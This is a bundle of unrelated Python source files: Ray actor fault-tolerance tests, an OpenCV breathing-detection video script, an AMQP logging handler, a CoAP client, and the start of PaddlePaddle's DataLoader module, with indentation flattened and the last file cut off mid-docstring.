assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
        # Kill the node hosting the parent actor.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
# Normal in order actor task retries should work
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
# Now let's try out of order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
    # seqno 3: this will crash the actor because the previous task set
    # should_exit to True.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
Hybrid_m_circles.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
fgbg = cv2.createBackgroundSubtractorMOG2()
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
dc = 6
red = 30
check_red = 1
start = 0
    radiuce_up_limit = 60
radiuce_low_limit = 30
i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
        # frame differencing
frame_diff = cv2.absdiff(current_frame,copy_frame)
ret ,binary_image1 = cv2.threshold(frame_diff,3,255,cv2.THRESH_BINARY)
# optical Flow
flow = cv2.calcOpticalFlowFarneback(copy_frame,current_frame, None, 0.5, 3, 15, 3, 5, 1.2, 0)
mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
hsv[...,0] = ang*180/np.pi/2
hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
grayscaled = cv2.cvtColor(bgr,cv2.COLOR_BGR2GRAY)
retval2 , binary_image2 = cv2.threshold(grayscaled,125,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# Background Subtraction
binary_image3 = fgbg.apply(current_frame)
        # Combine the three masks (frame difference, optical flow, background
        # subtraction) with a logical AND; cv2.bitwise_and takes two inputs at
        # a time, so chain the calls.
        final_binary = cv2.bitwise_and(cv2.bitwise_and(binary_image1, binary_image2), binary_image3)
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(final_binary, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red +10
if red > radiuce_up_limit:
check_red =0
else:
red = red -10
if red == radiuce_low_limit:
check_red =1
if lab_stats[1:, 4].size > 2:
start = 1
dc = dc +1
if dc > 6:
dc = 0
re = lab_stats[1:, 4].argsort()[-3:][::-1] + 1
largest_mask = np.zeros(final_binary.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts1 = cnts1[0] if imutils.is_cv2() else cnts1[1]
largest_mask[img_labeled == re[1]] = lab_val
cnts2 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts2 = cnts2[0] if imutils.is_cv2() else cnts2[1]
largest_mask[img_labeled == re[2]] = lab_val
cnts3 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts3 = cnts3[0] if imutils.is_cv2() else cnts3[1]
X1 = cnts3[0][0]
X2 = cnts3[1][0]
X3 = cnts3[2][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cX2 = X2[0][0]
cY2 = X2[0][1]
cX3 = X3[0][0]
cY3 = X3[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.circle(frame, (cX3, cY3), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.circle(frame, (cX3, cY3), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
previous_frame = current_frame
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
|
amqp_puka.py
|
from contexture import __version__
import json
import logging
import os
# import pika
import puka
from Queue import Queue, Full, Empty
import resource
import socket
import sys
import time
import threading
import uuid
# Don't make this __name__. Used by logging config to wire amqp handler.
LOGGER = logging.getLogger('contexture.internal')
# LOGGER.setLevel(logging.DEBUG)
LOGGER.debug("LOGGER.debug works")
def faux_record(obj):
class faux:
msg = obj
created = time.time()
routing_key = obj.get('routing_key', 'lc-handler')
return faux
def qitems(queue):
while True:
try:
yield queue.get_nowait()
except Empty:
raise StopIteration
# TODO: add heartbeat?
class AMQPHandler(logging.Handler):
INTERVAL = 1
# singleton stuff
_thread = None
_queue = None
_client = None
def __init__(self, url=None,
exchange='lc-topic',
exchange_type='topic',
user='guest',
password='guest',
host='localhost',
port=5672,
virtual_host='/',
headers={},
singleton=True,
maxqueue=300,
reconnect_wait=10,
):
if not url:
self._url = 'amqp://%s:%s@%s:%s%s' % (user, password, host, port, virtual_host)
# if url:
# self._conn_params = pika.URLParameters(url)
# else:
# creds = pika.credentials.PlainCredentials(user, password)
# self._conn_params = pika.ConnectionParameters(host=host,
# port=port,
# virtual_host=virtual_host,
# credentials=creds)
self._exchange = exchange
self._headers = headers
self._type = exchange_type
self._running = True
self._guid = str(uuid.uuid4())
env = dict(host=socket.gethostname(),
pid=os.getpid(),
argv=sys.argv,
tid=threading.current_thread().ident,
contexture=__version__,
)
self._headers['hostname'] = env['host']
self._throttled = 0
self._reconnect_wait = reconnect_wait
# Rely on attributes resolving up to the class level
# for singleton behavior.
if singleton:
target = self.__class__
else:
target = self
if not target._queue or not singleton:
target._queue = Queue(maxqueue)
target._thread = threading.Thread(target=self.run)
# if not target._thread.is_active():
LOGGER.debug('Starting daemonized thread')
target._thread.daemon = True
target._thread.start()
self.emit_obj(env)
logging.Handler.__init__(self)
def publish_record(self, record):
obj = record.msg
# Sometimes regular logging messages find their way into the queue
# (by misconfiguration, for example). Ignore them.
if not isinstance(obj, dict):
return
obj['time_out'] = time.time()
obj['time_in'] = record.created
# A little redundant, but, again, why not
obj['qtime'] = (obj['time_out'] - obj['time_in'])
obj['qlen'] = self._queue.qsize()
obj['handler_id'] = self._guid
headers = self._headers.copy()
headers.update(obj.pop('headers', {}))
        # What happens if destination is None?
destination = obj.pop('routing_key', 'default')
exchange = obj.pop('exchange', self._exchange)
try:
message = json.dumps(obj, default=lambda x: repr(x))
except Exception, e:
message = json.dumps(dict(error=repr(e)))
if self._running and self._client:
LOGGER.debug("publishing %s", message)
return self._client.basic_publish(exchange=exchange, routing_key=destination,
body=message, headers=headers)
else:
LOGGER.debug('Discarding %s', message)
def emit(self, record):
try:
self._queue.put_nowait(record)
except Full:
if self._throttled == 0:
size = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
LOGGER.warning('Queue full, discarding. Used %sK', size)
self._throttled += 1
def emit_obj(self, obj):
self.emit(faux_record(obj))
def publish_items(self):
batch = 0
promise = None
if self._running:
for item in qitems(self._queue):
LOGGER.debug('Publishing %r', item)
promise = self.publish_record(item)
# self._queue.task_done()
batch += 1
if self._throttled > 0:
LOGGER.warning('Queue overflow recovered, %s messages lost'
% self._throttled)
                self.publish_record(faux_record({'recovered': self._throttled}))
                self._throttled = 0
else:
LOGGER.warning('No channel, keeping messages')
return batch, promise
def schedule_burst(self, t, result):
        while self._running:
batch, promise = self.publish_items()
if batch:
LOGGER.debug("Purging %s queue items (promise %s)", batch, promise)
for x in xrange(batch):
self._queue.task_done()
else:
time.sleep(1)
if promise:
LOGGER.debug("Setting promised callback")
self._client.set_callback(promise, self.schedule_burst)
break
def on_connect(self, t, result):
LOGGER.debug("Declaring exchange %s", self._exchange)
self._client.exchange_declare(exchange=self._exchange,
type=self._type,
durable=True,
callback=self.schedule_burst)
def run(self):
while True:
try:
self._running = True
self._client = puka.Client(self._url)
self._client.connect(callback=self.on_connect)
# self._client.set_callback(promise, self.schedule_burst)
LOGGER.debug("Starting client loop")
self._client.loop()
LOGGER.debug("Client loop stopped.")
except Exception, e:
if self._reconnect_wait:
LOGGER.info('Sleeping for %s seconds and retrying'
% self._reconnect_wait)
# LOGGER.exception(e)
self._running = False
time.sleep(self._reconnect_wait)
else:
LOGGER.debug("No reconnect, KTHXBAI")
def queue_join(self):
if self._running:
self._queue.join()
def stop(self):
self.emit_obj({"stopping": True})
if self._running:
self._running = False
LOGGER.debug("running = False")
def __del__(self):
self.close()
def close(self):
self.stop()
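# A minimal usage sketch (illustrative only, not used by this module). It
# assumes a local broker reachable with the default guest/guest credentials,
# and the logger name below is hypothetical. It shows the pattern the handler
# expects: attach AMQPHandler to a logger and log dict payloads, since
# publish_record() silently ignores any record whose msg is not a dict.
if __name__ == '__main__':
    demo_log = logging.getLogger('contexture.demo')  # hypothetical logger name
    demo_log.setLevel(logging.INFO)
    demo_log.addHandler(AMQPHandler(host='localhost', exchange='lc-topic'))
    demo_log.info(dict(event='demo_started', routing_key='lc-handler'))
    time.sleep(2)  # give the background publisher thread a moment to flush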
|
coap.py
|
import logging.config
import os
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
from coapthon.utils import create_logging
__author__ = 'Giacomo Tanganelli'
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
        :param callback: the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
try:
# Python does not close the OS FD on socket.close()
# Ensure OS socket is closed with shutdown to prevent FD leak
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
        Prepare a message to send on the UDP socket, and start the retransmission task if needed.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def end_observation(self, token):
"""
Remove an observation token from our records.
:param token: the token for the observation
"""
dummy = Message()
dummy.token = token
dummy.destination = self._server
self._observeLayer.remove_subscriber(dummy)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
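# A small illustrative helper (a sketch, not part of the CoAP client and not
# used by it) that mirrors the timing logic of CoAP._retransmit above: the
# first wait is drawn uniformly from [ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR]
# and every retry doubles it, for at most MAX_RETRANSMIT retransmissions.
def _example_retransmission_schedule():
    wait = random.uniform(defines.ACK_TIMEOUT,
                          defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR)
    schedule = []
    for _ in range(defines.MAX_RETRANSMIT):
        schedule.append(wait)
        wait *= 2
    return schedule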
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & fail quickly ] This value is used when getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
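# Both toggles above share the same calling convention; a hypothetical
# illustration (not from the original source):
#     keep_data_loader_order()       # no argument: read the current value
#     keep_data_loader_order(False)  # one bool argument: set it
#     use_pinned_memory(True)        # same pattern for pinned memory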
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
            raise TypeError(
                "\n\tFailed to convert input data to a regular ndarray:\n\t* Usually "
                "this means the input data contains nested lists with different lengths. "
                "\n\t* Check the reader function passed to 'decorate_batch_generator'"
                " to locate the data that causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
    DataLoader provides an iterator which iterates over the given dataset
    once, in the order produced by the batch_sampler.
    DataLoader supports single-process and multi-process data loading;
    multi-process workers will be used to load data asynchronously if
    :attr:`num_workers` is set to a positive number.
    DataLoader supports map-style datasets and iterable-style datasets.
    For a map-style dataset (one that can return a sample for a given
    index), please see :code:`paddle.io.Dataset`.
    For an iterable-style dataset (one that yields samples iteratively,
    like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
**Disable automatic batching**
    In certain cases, such as some NLP tasks, users need to handle batching
    manually in the dataset instead of relying on automatic batching. For these
    cases, automatic batching is disabled if both :attr:`batch_size` and
    :attr:`batch_sampler` are set to None; each item fetched from :attr:`dataset`
    should then already be a batch and will be processed by the function given by
    :attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
        shuffle(bool): whether to shuffle sample indices before generating
            batch indices, a substitution parameter for :attr:`batch_sampler`,
            see :attr:`batch_size`. Default False.
        drop_last(bool): whether to drop the last incomplete batch when the
            dataset size is not divisible by the batch size, a substitution
            parameter for :attr:`batch_sampler`, see :attr:`batch_size`.
            Default False.
        collate_fn(callable): function to generate mini-batch data by merging
            the sample list; None means only stacking each field of the samples
            along axis 0 (same as :code:`np.stack(..., axis=0)`). Default None.
        num_workers(int): the number of subprocesses used to load data, 0 for
            no subprocess used and loading data in the main process. Default 0.
        use_buffer_reader (bool): whether to use a buffered reader.
            If use_buffer_reader=True, the DataLoader will prefetch the next
            batch of data asynchronously, which speeds up data feeding
            and occupies a little more CPU or GPU memory, i.e., the memory
            of one batch of input data. Default True.
        use_shared_memory (bool): whether to use shared memory to speed up
